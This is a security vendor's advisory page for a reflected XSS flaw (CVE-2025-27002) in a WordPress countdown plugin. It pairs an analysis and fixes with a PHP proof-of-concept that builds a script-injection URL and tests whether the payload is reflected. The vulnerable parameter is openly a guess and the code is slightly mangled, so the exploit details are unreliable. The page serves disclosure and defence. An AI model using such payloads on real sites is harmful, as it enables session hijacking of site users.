Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-27002: CountDown With Image or Video Background <= 1.5 – Reflected Cross-Site Scripting (countdown-with-background)

CVE ID CVE-2025-27002
Plugin countdown-with-background
Severity Medium (CVSS 6.1)
CWE 79
Vulnerable Version 1.5
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-27002 (metadata-based):
This vulnerability is a reflected cross-site scripting (XSS) flaw in the CountDown With Image or Video Background WordPress plugin, version 1.5 and earlier. The issue stems from insufficient input sanitization and output escaping in one or more plugin parameters. An unauthenticated attacker can exploit this by tricking a user into clicking a malicious link, leading to arbitrary script execution in the victim’s browser. The CVSS score of 6.1 (Medium severity) reflects the network-based attack vector, low attack complexity, and impacts on confidentiality and integrity within the victim’s browser context.

Atomic Edge research infers the root cause is a failure to properly sanitize user-supplied input before echoing it back in the HTTP response. The CWE-79 classification confirms improper neutralization of input during web page generation. Without a code diff, the exact vulnerable function cannot be confirmed. However, the description indicates the plugin likely accepts user input via a GET or POST parameter and directly outputs it without using WordPress escaping functions like `esc_html()` or `esc_attr()`.

Exploitation requires an attacker to craft a URL containing a malicious script payload in a vulnerable plugin parameter. A victim must be induced to visit this crafted link while authenticated to WordPress. The script then executes in the victim’s session. Based on WordPress plugin patterns, the attack vector is likely a frontend shortcode parameter or an AJAX handler action parameter accessible without authentication. A sample payload could be `?vulnerable_param=alert(document.domain)` appended to a page where the plugin renders its countdown.

Remediation requires implementing proper output escaping or input sanitization. The plugin should use WordPress core functions like `esc_html()`, `esc_attr()`, or `wp_kses()` on any user-controlled data before output. For parameters expected to contain specific data types, validation with `sanitize_text_field()` or type casting is also recommended. A patch would involve adding these escaping functions to the vulnerable echo or print statements.

The impact of successful exploitation is limited to the victim’s browser session but can lead to session hijacking, administrative actions performed on behalf of the user, or defacement of the site frontend. Attackers can steal session cookies, redirect users to malicious sites, or perform actions within the WordPress admin if the victim has elevated privileges. This vulnerability does not directly allow server-side code execution or database access.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-27002 - CountDown With Image or Video Background <= 1.5 - Reflected Cross-Site Scripting
<?php
/**
 * Proof of Concept for Reflected XSS in CountDown With Image or Video Background plugin <= 1.5.
 * This script demonstrates exploitation by crafting a malicious link with a JavaScript payload.
 * The exact vulnerable parameter is inferred from the vulnerability description and common plugin patterns.
 * Assumptions:
 * 1. The plugin has a frontend component accessible to unauthenticated users.
 * 2. A GET or POST parameter is reflected without proper escaping.
 * 3. The plugin may use shortcodes or AJAX handlers that accept user input.
 */
$target_url = 'http://vulnerable-wordpress-site.com/';

// Common inferred attack vectors for a countdown plugin:
// 1. A shortcode attribute parameter on a page or post.
// 2. An AJAX action endpoint via admin-ajax.php.
// 3. A direct plugin file parameter.
// This PoC targets a generic GET parameter 'cdwbg_param' as a placeholder.
// In a real attack, the attacker would need to identify the exact parameter name.
$malicious_parameter = 'cdwbg_param';
$payload = '<script>alert(document.domain)</script>';

// Construct the malicious URL.
$exploit_url = $target_url . '?' . $malicious_parameter . '=' . urlencode($payload);

echo "CVE-2025-27002 Reflected XSS PoCn";
echo "Target: " . $target_url . "n";
echo "Exploit URL: " . $exploit_url . "nn";
echo "Instructions:n";
echo "1. An attacker would send this URL to a victim (e.g., via phishing).n";
echo "2. The victim must visit the URL while authenticated to WordPress.n";
echo "3. The JavaScript payload executes in the victim's browser context.n";

// Optional: Use cURL to simulate a request and check if the payload is reflected.
// This step may not be reliable if the parameter requires a specific page context.
echo "n[+] Testing payload reflection...n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200) {
    if (strpos($response, $payload) !== false) {
        echo "Payload appears to be reflected in the response (unsanitized).n";
    } else {
        echo "Payload not found in response. The vulnerable parameter may have a different name or require a specific page.n";
    }
} else {
    echo "HTTP Status: " . $http_code . "n";
}
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School